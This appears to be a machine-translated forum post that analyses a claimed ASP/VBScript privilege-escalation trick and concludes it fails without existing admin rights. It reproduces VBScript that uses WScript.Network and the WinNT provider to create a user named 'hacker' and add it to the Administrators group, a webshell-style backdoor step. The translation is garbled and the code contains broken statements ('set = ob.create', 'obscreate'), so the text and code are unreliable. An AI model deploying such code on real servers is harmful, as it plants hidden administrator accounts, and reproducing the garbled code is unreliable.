Excerpted from Lake2, this stuff is boiling, if you don't know, let's see
"Add superuser .asp code"
This article is.
The author also said, "Anyway code is right, but very few can succeed, the specific look at", even brought to Webshell trial, failed. Remove the fault tolerant statement, seeing the error reason is "not enough permissions". Nothing today, I will analyze and analyze, I may not be ... oh.
His code key is this:
Set lp = server.createObject ("wscript.network") oz = "Winnt: //" & lp.computername set ob = GetObject (oz) set oe = getObject (oz & "/ administrators, group") set = ob.create ("User", username odd.setPassword passwd od.setinfo oe.add oz & "/" & username
It is nothing more than to create a WScript.Network object in the ASP and add users to the administrator with this object. And according to their statement, this is the use of .NetWork object local permissions to improve vulnerabilities (they say this is MS). Well, then I made the code into a VBS script file. I will try it if I get the command.
Test.vbe (VBE is better than VBS; VBS operation is limited) --------------------------------- ----------- set lp = createObject ("wscript.network") oz = "winnt: //" & lp.computername set ob = getObject (oz) set oe = getObject (oz & "/ administrators, ") set = obscreate (" User "," HACKER ") od.setPassword test od.setinfo oe.add oz &" / "&" hacker "-------------- -----------------------------
The Hacker user is generated under Admin rights; USER Permission execution file error: refuses to access. It seems that there is not enough permissions, ie, there is no so-called MS unpublished ".NetWork object local permissions to improve the vulnerability" - at least I don't exist on this XP SP1. You can also save the above code as Vbe get User permissions. Try this bug in other systems, but since this ASP is rarely possible, it will not exist.
Tell me back to the sun to tell me if IIS opened the ASP. I closed the anonymous access of IIS locally, and this script can work. But at this time, your browsing is administrator privilege. Think about it is an anonymous access, why didn't I pop up a dialog to allow you to lose user password? Oh, you have the basic verification of Windows in the local nature, and I am administrator, of course, those ASPs have inherited admin privileges. I don't know if the author is wrong here?
I think this legend is wrong, welcome to advise. Let's talk about it first - I am not allowed to face ^ _ ^
